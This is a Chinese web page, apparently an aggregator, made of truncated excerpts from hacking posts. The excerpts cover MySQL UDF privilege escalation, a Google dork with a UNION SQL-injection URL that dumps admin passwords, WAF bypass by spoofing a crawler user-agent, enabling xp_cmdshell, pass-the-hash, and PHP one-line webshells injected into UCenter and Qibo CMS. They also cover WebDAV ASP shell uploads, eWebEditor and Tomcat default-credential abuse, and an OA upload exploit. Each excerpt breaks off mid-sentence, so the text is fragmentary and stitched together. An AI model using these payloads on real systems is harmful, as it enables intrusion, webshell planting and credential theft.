刚在http://www.rabbit8.cn/MYSQL/395.html,看到建立lib\plugin目录的方法.留个脚印查询 select @@basedir (或者 select @@datadir)得到MySQL目录 C:\MySql\假如该目录不存在\lib\plugin目录,利用ADS创建查询 select 'xxx' into dumpfile 'C:\\M
测试环境 windows2008R2_64,mysql 5.0.*_32使用的sqlmap中提供的udf.dll 过了nod32,成功上传中间有个误区,刚开始以为是根据系统的版本是否32位、64位来选择dll,在开始上传的64的udf的dll,提示错误,纠结了很久最后上传了一个32位的dll,成功执行:create function sys_eval returns string soname &
原帖地址内容:http://zone.wooyun.org/content/3894用户 – 用户栏目 – 栏目分组 – 提交 – 抓包 (我就是在这步出错的,一定要提交,不然抓到的数据包不一样)1Content-Disposition: form-data; name="settingnew[profilegroupnew][base][available]"改为1Conte
见http://www.wooyun.org/bugs/wooyun-2010-03787以前6.5的有人发的方法是,(进入后台---系统设置---管理数据表---管理系统模型---导入新型模块,直接把修改过的php的shell改名为shell.php.mod上传,新版使用uploadm~num.php来递增数字)发现6.6不行,上传之后会变成类似uploadm1324885505nXmTdQam
1.google搜索:inurl:"userinfo.asp?yhm="2.注入exp:直接暴管理员密码/userinfo.asp?yhm='%20union%20select%201,2,3,yhm%2bchr(35)%2bpass,5,6,7,8,9,10,11,12,13,14,15%20from%20yrwl_tb_admin /ad.asp?ad='%20union
转自:http://www.cnseay.com/2751/ 伪造爬虫的user-agent来进行绕过. 如果是你做网站,装了WAF,肯定是会把搜索引擎的爬虫放到白名单里面,不然SEO就蛋疼了。 白名单意味着啥??? 就是说在白名单里面的用户,WAF都会不管它,直接放行,那我们就可以利用这个东西来绕过安全狗。 搜索引擎爬虫是在安全狗的白名单
执行数据库指令 EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
前提: 1.获取到目标的管理员帐户hash 2.目标开放了默认共享端口 实施: 1.使用wce工具把目标的sessions设置为当前的session wce -s Administrator:500:×××87EEB66D08E08770:×××E22B1DFBFA6072 ps:可
直接在UCenter IP 地址:里面插入一句话 xxoo\\');eval($_POST[a])?>;// 就ok 然后菜刀连接http://ip/config/config_ucenter.php 密码a ps:自己搭的测试环境,开始写入时,会跳转重新验证,可能是缓存问题未直接成功,后修改为允许直接激活后,如图,写
前提:1.目标可写,开启了脚本资源访问,服务器扩展,允许webdav 1.telnet IP port,然后复制下面输入到控制台,回车: PUT /test.txt HTTP/1.1 HOST: 127.0.0.1 Content-Length: 27 <% execute&nbs
后台--系统功能--单篇文章独立页面管理--增加页面-- 1.标题栏中 <?php $_GET['test']($_POST['cmd']);?> 2.静态页面名test001.php3.点击提交,点击生成静态4.菜刀连接http://127.0.0.1:8000/qibo/test001.php?test=assert &
1.目标网站使用的eWebEditor,在线编辑器 默认后台:data/eWebEditor/admin_login.asp 2. 下载数据库,md5解密得到后台账户密码。db/ewebeditor.mdb 3.进入后台,样式管理--新增样式--其他文件上传--添加asa类型, 设置样式名称为test,当前样式id=47
有些Tomcat安装之后没有修改默认密码(用户名admin/admin),这样就可以直接登录进去。 有两个目录可以访问: /admin /manager/html /admin 目录下的利用: Service--host--actions--Create New Context建立虚拟目录Document Base填你想浏览的目录,比如c:\,Path自己随便写,例如/gui
exp: <form id="frmUpload" enctype="multipart/form-data" action="http://ip:port/general/vmeet/privateUpload.php?fileName=211.php.111" m
转载自T00ls 此程序应用于非常多的政府机构, 教育机构, 以及各大一流公司(中国电信等)! 请各位看完本文后不要试图对任何使用本程序的网站进行破坏攻击入侵等… 本人发此贴纯属技术交流探讨, 并无怂恿别人去尝试攻击的意思! 若不接受以上条件的请自觉关闭, 由此产生的后果与作者(本人)无关! EXP: 第一步: http://ip/gene
Copyright © 2005-2024 51CTO.COM 版权所有 京ICP证060544号